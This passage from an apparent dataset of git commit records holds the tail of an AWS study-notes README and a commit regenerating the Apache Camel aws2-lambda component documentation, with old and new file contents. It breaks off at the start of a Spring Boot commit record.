link:https:\/\/aws.amazon.com\/free\/[AWS free tier account].\n\n\n== Lecture \/ Lab Notes\n\n[cols=\">s,m\", width=\"100%\"]\n|=========================================================\n2+>| **Intro**\n||link:overview.md[10,000 Foot Overview]\n||link:dont-freakout.md[Don't Freakout]\n2+>| **IAM**\n||link:iam\/iam.md[IAM 101]\n||link:iam\/billing-alarm.md[Creating a Billing Alarm]\n2+>| **S3**\n||link:s3\/s3.md[S3 101]\n||link:s3\/s3-versioning.md[S3 Versioning]\n||link:s3\/s3-lifecycle.md[Life Cycle Management]\n||link:s3\/s3-encryption.md[Encryption]\n||link:s3\/s3-static-website.md[Static Website Hosting]\n||link:s3\/s3-exam-tips.md[Exam Tips]\n||link:https:\/\/aws.amazon.com\/s3\/faqs\/[S3 FAQ]\n2+>| **CloudFront**\n||link:cloudfront\/cloudfront-intro.md[CloudFront 101]\n||link:cloudfront\/cloudfront-create-a-cdn.md[Create a Distribution]\n||link:cloudfront\/cloudfront-exam-tips.md[Exam Tips]\n2+>| **Storage Gateway**\n||link:storage-gateway\/storage-gateway.md[Storage Gateway 101]\n||link:storage-gateway\/storage-gateway-exam-tips.md[Exam Tips]\n2+>| **Snowball**\n||link:snowball\/snowball.md[Snowball 101]\n||link:snowball\/snowball-exam-tips.md[Exam Tips]\n2+>| **EC2**\n||link:ec2\/ec2-101-pt1.md[EC2 101 - Part 1]\n||link:ec2\/ec2-101-pt2.md[EC2 101 - Part 2]\n||link:ec2\/ec2-instance-lab.md[EC2 Instance Lab]\n||link:ec2\/ec2-security-groups-lab.md[EC2 Security Groups Lab]\n||link:ec2\/ec2-ebs-volumes-lab.md[EC2 EBS Volumes Lab]\n||link:ec2\/ec2-encrypted-root-lab.md[EC2 Encrypted Root Volume Lab]\n||link:ec2\/ec2-ami-types.md[EC2 AMI Types: EBS vs Instance Store]\n||link:ec2\/ec2-elastic-load-balancer-lab.md[EC2 Elastic Load Balancer Lab]\n||link:ec2\/ec2-cloudwatch-lab.md[EC2 Cloudwatch Lab]\n||link:ec2\/ec2-commandline-lab.md[AWS Commandline Lab]\n||link:ec2\/ec2-iam-roles-lab.md[EC2 IAM Roles Lab]\n||link:ec2\/ec2-s3-regions-lab.md[EC2 S3 CLI and Regions Lab]\n||link:ec2\/ec2-bash-scripting-lab.md[EC2 Bash Scripting Lab]\n||link:ec2\/ec2-instance-metadata.md[EC2 Instance Metadata]\n||link:ec2\/ec2-auto-scaling-groups-lab.md[EC2 Auto Scaling Groups Lab]\n||link:ec2\/ec2-placement-groups.md[EC2 Placement Groups]\n||link:ec2\/ec2-efs-lab.md[EC2 EFS Lab]\n||link:https:\/\/aws.amazon.com\/ec2\/faqs\/[EC2 FAQ]\n||link:https:\/\/aws.amazon.com\/elasticloadbalancing\/faqs\/[ELB FAQ for Classic Load Balancer]\n|=========================================================\n\n","old_contents":"= Amazon Web Services\n\nI finally finished my bachelor's degree in 2015. At 40 I graduated Cum Laude from the Illinois Institute of\nTechnology's Information and Technology Management program. The achievement took nearly eight years of\nmy life and cost over 80K. In hindsight, I wish I would have just spent that time (and money) studying and\nmastering AWS. Anyway, life goes on and here we are--making-up for lost time. This directory is\ndedicated to my notes and `fiddles` involving AWS. At the outset, this just means markdown files written\nwhile watching lectures\/labs on link:http:\/\/acloud.guru[acloud.guru]. All of my studies have been\ndone using an link:https:\/\/aws.amazon.com\/free\/[AWS free tier account].\n\n\n== Lecture \/ Lab Notes\n\n[cols=\">s,m\", width=\"100%\"]\n|=========================================================\n2+>| **Intro**\n||link:overview.md[10,000 Foot Overview]\n||link:dont-freakout.md[Don't Freakout]\n2+>| **IAM**\n||link:iam\/iam.md[IAM 101]\n||link:iam\/billing-alarm.md[Creating a Billing Alarm]\n2+>| **S3**\n||link:s3\/s3.md[S3 101]\n||link:s3\/s3-versioning.md[S3 Versioning]\n||link:s3\/s3-lifecycle.md[Life Cycle Management]\n||link:s3\/s3-encryption.md[Encryption]\n||link:s3\/s3-static-website.md[Static Website Hosting]\n||link:s3\/s3-exam-tips.md[Exam Tips]\n||link:https:\/\/aws.amazon.com\/s3\/faqs\/[S3 FAQ]\n2+>| **CloudFront**\n||link:cloudfront\/cloudfront-intro.md[CloudFront 101]\n||link:cloudfront\/cloudfront-create-a-cdn.md[Create a Distribution]\n||link:cloudfront\/cloudfront-exam-tips.md[Exam Tips]\n2+>| **Storage Gateway**\n||link:storage-gateway\/storage-gateway.md[Storage Gateway 101]\n||link:storage-gateway\/storage-gateway-exam-tips.md[Exam Tips]\n2+>| **Snowball**\n||link:snowball\/snowball.md[Snowball 101]\n||link:snowball\/snowball-exam-tips.md[Exam Tips]\n2+>| **EC2**\n||link:ec2\/ec2-101-pt1.md[EC2 101 - Part 1]\n||link:ec2\/ec2-101-pt2.md[EC2 101 - Part 2]\n||link:ec2\/ec2-instance-lab.md[EC2 Instance Lab]\n||link:ec2\/ec2-security-groups-lab.md[EC2 Security Groups Lab]\n||link:ec2\/ec2-ebs-volumes-lab.md[EC2 EBS Volumes Lab]\n||link:ec2\/ec2-encrypted-root-lab.md[EC2 Encrypted Root Volume Lab]\n||link:ec2\/ec2-ami-types.md[EC2 AMI Types: EBS vs Instance Store]\n||link:ec2\/ec2-elastic-load-balancer-lab.md[EC2 Elastic Load Balancer Lab]\n||link:ec2\/ec2-cloudwatch-lab.md[EC2 Cloudwatch Lab]\n||link:ec2\/ec2-commandline-lab.md[AWS Commandline Lab]\n||link:ec2\/ec2-iam-roles-lab.md[EC2 IAM Roles Lab]\n||link:ec2\/ec2-s3-regions-lab.md[EC2 S3 CLI and Regions Lab]\n||link:ec2\/ec2-bash-scripting-lab.md[EC2 Bash Scripting Lab]\n||link:ec2\/ec2-instance-metadata.md[EC2 Instance Metadata]\n||link:ec2\/ec2-auto-scaling-groups-lab.md[EC2 Auto Scaling Groups Lab]\n||link:ec2\/ec2-placement-groups.md[EC2 Placement Groups]\n||link:ec2\/ec2-efs-lab.md[EC2 EFS Lab]\n||link:https:\/\/aws.amazon.com\/ec2\/faqs\/[EC2 FAQ]\n||link:https:\/\/aws.amazon.com\/elasticloadbalancing\/faqs\/[ELB FAQ for Classic Load Balancer]\n|=========================================================\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"c479ba0f75be5d9f9d44cdbe0277690c21480f32","subject":"CAMEL-14556 - Create an AWS-Lambda component based on SDK v2, regen docs","message":"CAMEL-14556 - Create an AWS-Lambda component based on SDK v2, regen docs\n","repos":"zregvart\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,pmoerenhout\/camel,DariusX\/camel,ullgren\/camel,adessaigne\/camel,nikhilvibhav\/camel,ullgren\/camel,alvinkwekel\/camel,cunningt\/camel,christophd\/camel,mcollovati\/camel,apache\/camel,zregvart\/camel,gnodet\/camel,alvinkwekel\/camel,pax95\/camel,pax95\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,tdiesler\/camel,tdiesler\/camel,mcollovati\/camel,tdiesler\/camel,pax95\/camel,nicolaferraro\/camel,cunningt\/camel,nikhilvibhav\/camel,apache\/camel,gnodet\/camel,mcollovati\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,tadayosi\/camel,apache\/camel,christophd\/camel,pmoerenhout\/camel,DariusX\/camel,cunningt\/camel,tdiesler\/camel,pax95\/camel,gnodet\/camel,adessaigne\/camel,zregvart\/camel,apache\/camel,adessaigne\/camel,adessaigne\/camel,nicolaferraro\/camel,adessaigne\/camel,mcollovati\/camel,nicolaferraro\/camel,ullgren\/camel,pmoerenhout\/camel,nicolaferraro\/camel,ullgren\/camel,alvinkwekel\/camel,tdiesler\/camel,gnodet\/camel,nikhilvibhav\/camel,pax95\/camel,cunningt\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tadayosi\/camel,zregvart\/camel,apache\/camel,adessaigne\/camel,christophd\/camel,nikhilvibhav\/camel,tdiesler\/camel,christophd\/camel,DariusX\/camel,gnodet\/camel","old_file":"components\/camel-aws2-lambda\/src\/main\/docs\/aws2-lambda-component.adoc","new_file":"components\/camel-aws2-lambda\/src\/main\/docs\/aws2-lambda-component.adoc","new_contents":"= AWS Lambda Component\n\n*Since Camel 2.20*\n*Since Camel 3.2*\n\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe Lambda component supports create, get, list, delete and invoke\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda] functions.\n\n*Prerequisites*\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon Lambda. More information is available at\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda].\n\nWhen creating a Lambda function, you need to specify a IAM role which has at least the AWSLambdaBasicExecuteRole policy attached.\n\n*Warning*\n\nLambda is regional service. Unlike S3 bucket, Lambda function created in a given region is not available on other regions.\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-lambda:\/\/functionName[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS Lambda component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *region* (producer) | Amazon AWS Region | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *configuration* (advanced) | The AWS Lambda default configuration | | Lambda2Configuration\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS Lambda endpoint is configured using URI syntax:\n\n----\naws2-lambda:function\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *function* | *Required* Name of the Lambda function. | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. It can be listFunctions, getFunction, createFunction, deleteFunction or invokeFunction. The value can be one of: listFunctions, getFunction, createAlias, deleteAlias, getAlias, listAliases, createFunction, deleteFunction, invokeFunction, updateFunction, createEventSourceMapping, deleteEventSourceMapping, listEventSourceMapping, listTags, tagResource, untagResource, publishVersion, listVersions | invokeFunction | Lambda2Operations\n| *region* (producer) | Amazon AWS Region. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *awsLambdaClient* (advanced) | To use a existing configured AwsLambdaClient as client | | LambdaClient\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *proxyHost* (proxy) | To define a proxy host when instantiating the Lambda client | | String\n| *proxyPort* (proxy) | To define a proxy port when instantiating the Lambda client | | Integer\n| *proxyProtocol* (proxy) | To define a proxy protocol when instantiating the Lambda client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired Lambda component options\n\nYou have to provide the awsLambdaClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/lambda\/[Amazon Lambda] service.\n\n== Usage\n\n=== Message headers evaluated by the Lambda producer\n\n[width=\"100%\",cols=\"5%,5%,10%,75%,5%\",options=\"header\",]\n|=======================================================================\n|Operation |Header |Type |Description |Required\n\n|All |`CamelAwsLambdaOperation` |`String` |The operation we want to perform. Override operation passed as query parameter| Yes\n\n|createFunction |`CamelAwsLambdaS3Bucket` |`String` |Amazon S3 bucket name where the .zip file containing\nyour deployment package is stored. This bucket must reside in the same AWS region where you are creating the Lambda function.| No\n\n|createFunction |`CamelAwsLambdaS3Key` |`String` |The Amazon S3 object (the deployment package) key name\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaS3ObjectVersion` |String |The Amazon S3 object (the deployment package) version\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaZipFile` |`String` |The local path of the zip file (the deployment package).\n Content of zip file can also be put in Message body.| No\n\n|createFunction |`CamelAwsLambdaRole` |`String` |The Amazon Resource Name (ARN) of the IAM role that Lambda assumes\n when it executes your function to access any other Amazon Web Services (AWS) resources. |Yes\n\n|createFunction |`CamelAwsLambdaRuntime` |String |The runtime environment for the Lambda function you are uploading.\n (nodejs, nodejs4.3, nodejs6.10, java8, python2.7, python3.6, dotnetcore1.0, odejs4.3-edge) |Yes\n\n|createFunction |`CamelAwsLambdaHandler` |`String` |The function within your code that Lambda calls to begin execution.\n For Node.js, it is the module-name.export value in your function.\n For Java, it can be package.class-name::handler or package.class-name.|Yes\n\n|createFunction |`CamelAwsLambdaDescription` |`String` |The user-provided description.|No\n\n|createFunction |`CamelAwsLambdaTargetArn` |`String` |The parent object that contains the target ARN (Amazon Resource Name)\nof an Amazon SQS queue or Amazon SNS topic.|No\n\n|createFunction |`CamelAwsLambdaMemorySize` |`Integer` |The memory size, in MB, you configured for the function.\nMust be a multiple of 64 MB.|No\n\n|createFunction |`CamelAwsLambdaKMSKeyArn` |`String` |The Amazon Resource Name (ARN) of the KMS key used to encrypt your function's environment variables.\nIf not provided, AWS Lambda will use a default service key.|No\n\n|createFunction |`CamelAwsLambdaPublish` |`Boolean` |This boolean parameter can be used to request AWS Lambda\nto create the Lambda function and publish a version as an atomic operation.|No\n\n|createFunction |`CamelAwsLambdaTimeout` |`Integer` |The function execution time at which Lambda should terminate the function.\nThe default is 3 seconds.|No\n\n|createFunction |`CamelAwsLambdaTracingConfig` |`String` |Your function's tracing settings (Active or PassThrough).|No\n\n|createFunction |`CamelAwsLambdaEnvironmentVariables` |`Map<String, String>` |The key-value pairs that represent your environment's configuration settings.|No\n\n|createFunction |`CamelAwsLambdaEnvironmentTags` |`Map<String, String>` |The list of tags (key-value pairs) assigned to the new function.|No\n\n|createFunction |`CamelAwsLambdaSecurityGroupIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more security groups IDs in your VPC.|No\n\n|createFunction |`CamelAwsLambdaSubnetIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more subnet IDs in your VPC.|No\n\n|createAlias |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionDescription` |`String` |The function description to set in the alias|No\n\n|deleteAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|getAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|listAliases |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|=======================================================================\n\n== List of Avalaible Operations\n\n- listFunctions\n- getFunction\n- createFunction\n- deleteFunction\n- invokeFunction\n- updateFunction\n- createEventSourceMapping\n- deleteEventSourceMapping\n- listEventSourceMapping\n- listTags\n- tagResource\n- untagResource\n- publishVersion\n- listVersions\n- createAlias\n- deleteAlias\n- getAlias\n- listAliases\n\n== Example\n\nTo have a full understanding of how the component works, you may have a look at this https:\/\/github.com\/apache\/camel\/blob\/master\/components\/camel-aws\/src\/test\/java\/org\/apache\/camel\/component\/aws\/lambda\/integration\/LambdaComponentIntegrationTest.java[integration test]\n\n== Automatic detection of LambdaClient client in registry\n\nThe component is capable of detecting the presence of an LambdaClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-lambda<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n\ninclude::camel-spring-boot::page$aws-lambda-starter.adoc[]\n","old_contents":"[[aws2-lambda-component]]\n= AWS2 Lambda Component\n\n*Since Camel 2.20*\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe Lambda component supports create, get, list, delete and invoke\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda] functions.\n\n*Prerequisites*\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon Lambda. More information is available at\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda].\n\nWhen creating a Lambda function, you need to specify a IAM role which has at least the AWSLambdaBasicExecuteRole policy attached.\n\n*Warning*\n\nLambda is regional service. Unlike S3 bucket, Lambda function created in a given region is not available on other regions.\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-lambda:\/\/functionName[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS Lambda component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *region* (producer) | Amazon AWS Region | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *configuration* (advanced) | The AWS Lambda default configuration | | LambdaConfiguration\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS Lambda endpoint is configured using URI syntax:\n\n----\naws-lambda:function\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *function* | *Required* Name of the Lambda function. | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. It can be listFunctions, getFunction, createFunction, deleteFunction or invokeFunction. The value can be one of: listFunctions, getFunction, createAlias, deleteAlias, getAlias, listAliases, createFunction, deleteFunction, invokeFunction, updateFunction, createEventSourceMapping, deleteEventSourceMapping, listEventSourceMapping, listTags, tagResource, untagResource, publishVersion, listVersions | invokeFunction | LambdaOperations\n| *region* (producer) | Amazon AWS Region. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *awsLambdaClient* (advanced) | To use a existing configured AwsLambdaClient as client | | AWSLambda\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *proxyHost* (proxy) | To define a proxy host when instantiating the Lambda client | | String\n| *proxyPort* (proxy) | To define a proxy port when instantiating the Lambda client | | Integer\n| *proxyProtocol* (proxy) | To define a proxy protocol when instantiating the Lambda client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired Lambda component options\n\nYou have to provide the awsLambdaClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/lambda\/[Amazon Lambda] service.\n\n== Usage\n\n=== Message headers evaluated by the Lambda producer\n\n[width=\"100%\",cols=\"5%,5%,10%,75%,5%\",options=\"header\",]\n|=======================================================================\n|Operation |Header |Type |Description |Required\n\n|All |`CamelAwsLambdaOperation` |`String` |The operation we want to perform. Override operation passed as query parameter| Yes\n\n|createFunction |`CamelAwsLambdaS3Bucket` |`String` |Amazon S3 bucket name where the .zip file containing\nyour deployment package is stored. This bucket must reside in the same AWS region where you are creating the Lambda function.| No\n\n|createFunction |`CamelAwsLambdaS3Key` |`String` |The Amazon S3 object (the deployment package) key name\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaS3ObjectVersion` |String |The Amazon S3 object (the deployment package) version\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaZipFile` |`String` |The local path of the zip file (the deployment package).\n Content of zip file can also be put in Message body.| No\n\n|createFunction |`CamelAwsLambdaRole` |`String` |The Amazon Resource Name (ARN) of the IAM role that Lambda assumes\n when it executes your function to access any other Amazon Web Services (AWS) resources. |Yes\n\n|createFunction |`CamelAwsLambdaRuntime` |String |The runtime environment for the Lambda function you are uploading.\n (nodejs, nodejs4.3, nodejs6.10, java8, python2.7, python3.6, dotnetcore1.0, odejs4.3-edge) |Yes\n\n|createFunction |`CamelAwsLambdaHandler` |`String` |The function within your code that Lambda calls to begin execution.\n For Node.js, it is the module-name.export value in your function.\n For Java, it can be package.class-name::handler or package.class-name.|Yes\n\n|createFunction |`CamelAwsLambdaDescription` |`String` |The user-provided description.|No\n\n|createFunction |`CamelAwsLambdaTargetArn` |`String` |The parent object that contains the target ARN (Amazon Resource Name)\nof an Amazon SQS queue or Amazon SNS topic.|No\n\n|createFunction |`CamelAwsLambdaMemorySize` |`Integer` |The memory size, in MB, you configured for the function.\nMust be a multiple of 64 MB.|No\n\n|createFunction |`CamelAwsLambdaKMSKeyArn` |`String` |The Amazon Resource Name (ARN) of the KMS key used to encrypt your function's environment variables.\nIf not provided, AWS Lambda will use a default service key.|No\n\n|createFunction |`CamelAwsLambdaPublish` |`Boolean` |This boolean parameter can be used to request AWS Lambda\nto create the Lambda function and publish a version as an atomic operation.|No\n\n|createFunction |`CamelAwsLambdaTimeout` |`Integer` |The function execution time at which Lambda should terminate the function.\nThe default is 3 seconds.|No\n\n|createFunction |`CamelAwsLambdaTracingConfig` |`String` |Your function's tracing settings (Active or PassThrough).|No\n\n|createFunction |`CamelAwsLambdaEnvironmentVariables` |`Map<String, String>` |The key-value pairs that represent your environment's configuration settings.|No\n\n|createFunction |`CamelAwsLambdaEnvironmentTags` |`Map<String, String>` |The list of tags (key-value pairs) assigned to the new function.|No\n\n|createFunction |`CamelAwsLambdaSecurityGroupIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more security groups IDs in your VPC.|No\n\n|createFunction |`CamelAwsLambdaSubnetIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more subnet IDs in your VPC.|No\n\n|createAlias |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionDescription` |`String` |The function description to set in the alias|No\n\n|deleteAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|getAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|listAliases |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|=======================================================================\n\n== List of Avalaible Operations\n\n- listFunctions\n- getFunction\n- createFunction\n- deleteFunction\n- invokeFunction\n- updateFunction\n- createEventSourceMapping\n- deleteEventSourceMapping\n- listEventSourceMapping\n- listTags\n- tagResource\n- untagResource\n- publishVersion\n- listVersions\n- createAlias\n- deleteAlias\n- getAlias\n- listAliases\n\n== Example\n\nTo have a full understanding of how the component works, you may have a look at this https:\/\/github.com\/apache\/camel\/blob\/master\/components\/camel-aws\/src\/test\/java\/org\/apache\/camel\/component\/aws\/lambda\/integration\/LambdaComponentIntegrationTest.java[integration test]\n\n== Automatic detection of LambdaClient client in registry\n\nThe component is capable of detecting the presence of an LambdaClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-lambda<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n\ninclude::camel-spring-boot::page$aws-lambda-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5692b83a6f428b8975934a74234ec7601403c2c8","subject":"Add note on sanitizing values","message":"Add note on sanitizing values\n\nCloses gh-13138\n","repos":"zhanhb\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,felipeg48\/spring-boot,joshiste\/spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,kdvolder\/spring-boot,ptahchiev\/spring-boot,felipeg48\/spring-boot,mbenson\/spring-boot,tsachev\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,mbenson\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot,jxblum\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,felipeg48\/spring-boot,NetoDevel\/spring-boot,drumonii\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,ptahchiev\/spring-boot,ilayaperumalg\/spring-boot,bclozel\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,royclarkson\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,lburgazzoli\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,bclozel\/spring-boot,kdvolder\/spring-boot,Buzzardo\/spring-boot,tiarebalbi\/spring-boot,felipeg48\/spring-boot,yangdd1205\/spring-boot,royclarkson\/spring-boot,tsachev\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,joshiste\/spring-boot,chrylis\/spring-boot,htynkn\/spring-boot,rweisleder\/spring-boot,ptahchiev\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,eddumelendez\/spring-boot,NetoDevel\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,tsachev\/spring-boot,lburgazzoli\/spring-boot,bclozel\/spring-boot,aahlenst\/spring-boot,bclozel\/spring-boot,shakuzen\/spring-boot,ilayaperumalg\/spring-boot,rweisleder\/spring-boot,joshiste\/spring-boot,mdeinum\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,royclarkson\/spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,kdvolder\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,michael-simons\/spring-boot,eddumelendez\/spring-boot,spring-projects\/spring-boot,michael-simons\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,donhuvy\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,jxblum\/spring-boot,donhuvy\/spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,bclozel\/spring-boot,yangdd1205\/spring-boot,mbenson\/s